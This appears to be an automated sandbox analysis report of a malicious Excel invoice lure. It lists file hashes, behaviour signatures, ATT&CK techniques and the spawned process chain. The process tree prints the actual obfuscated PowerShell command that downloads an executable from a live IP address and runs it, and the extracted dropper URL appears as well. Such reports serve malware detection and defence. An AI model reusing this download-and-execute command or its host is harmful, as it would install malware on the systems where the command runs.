Analysis

  • max time kernel
    600s
  • max time network
    600s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    26-10-2021 07:00

General

  • Target

    Leak/Proforma invoice35117img.xls

  • Size

    118KB

  • MD5

    9a5a1a96ece8355f2058a27b2ba2770e

  • SHA1

    e12d878494854545cb39c316cc98db3c9577bf25

  • SHA256

    c7f619995bc97f5c8b8b24e9d55cf36d2eb0af87ba5eb389cb36ec7b0c669b76

  • SHA512

    1503cdd8083531b098a7ae8c31af63658763bc9147fe80571bbeb34249d1264a963104aaa512fec0efe3c2659eb6b1219cb2b64522cf0843c8b7284e0394edd8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://18.159.149.5/nbl/joy/11/Sample_10120351200_ISO_035117img.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Leak\Proforma invoice35117img.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:764
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Public\Documents\maybecall.cmd" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:616
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://18.159.149.5/nbl/joy/1-1/Sample_10120351200_ISO_035117img.e`xe -Destination C:\Users\Public\Documents\familylight.e`xe;C:\Users\Public\Documents\familylight.e`xe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1712

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\maybecall.cmd
    MD5

    4387c730bddc006f9a2f33463445af15

    SHA1

    0dc6a5d470ffb2ac84a559f3906b21682e36e427

    SHA256

    0c76eb979aaac6380ef776979590bade42983bea5cdaedc21e6bf22b1faee8ec

    SHA512

    ec74f87edadf84407938faeac4ca1c85f70d792b1e327852b96c2ca946506d042d7e6899a83a800d626d3c4f5727f4574c9e4e3abd2d6682b523b993f84b626b

  • memory/616-58-0x0000000000000000-mapping.dmp
  • memory/764-55-0x000000002FA71000-0x000000002FA74000-memory.dmp
    Filesize

    12KB

  • memory/764-56-0x00000000713D1000-0x00000000713D3000-memory.dmp
    Filesize

    8KB

  • memory/764-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/764-65-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1712-60-0x0000000000000000-mapping.dmp
  • memory/1712-61-0x00000000754A1000-0x00000000754A3000-memory.dmp
    Filesize

    8KB

  • memory/1712-62-0x0000000002520000-0x0000000002521000-memory.dmp
    Filesize

    4KB

  • memory/1712-63-0x0000000002521000-0x0000000002522000-memory.dmp
    Filesize

    4KB

  • memory/1712-64-0x0000000002522000-0x0000000002524000-memory.dmp
    Filesize

    8KB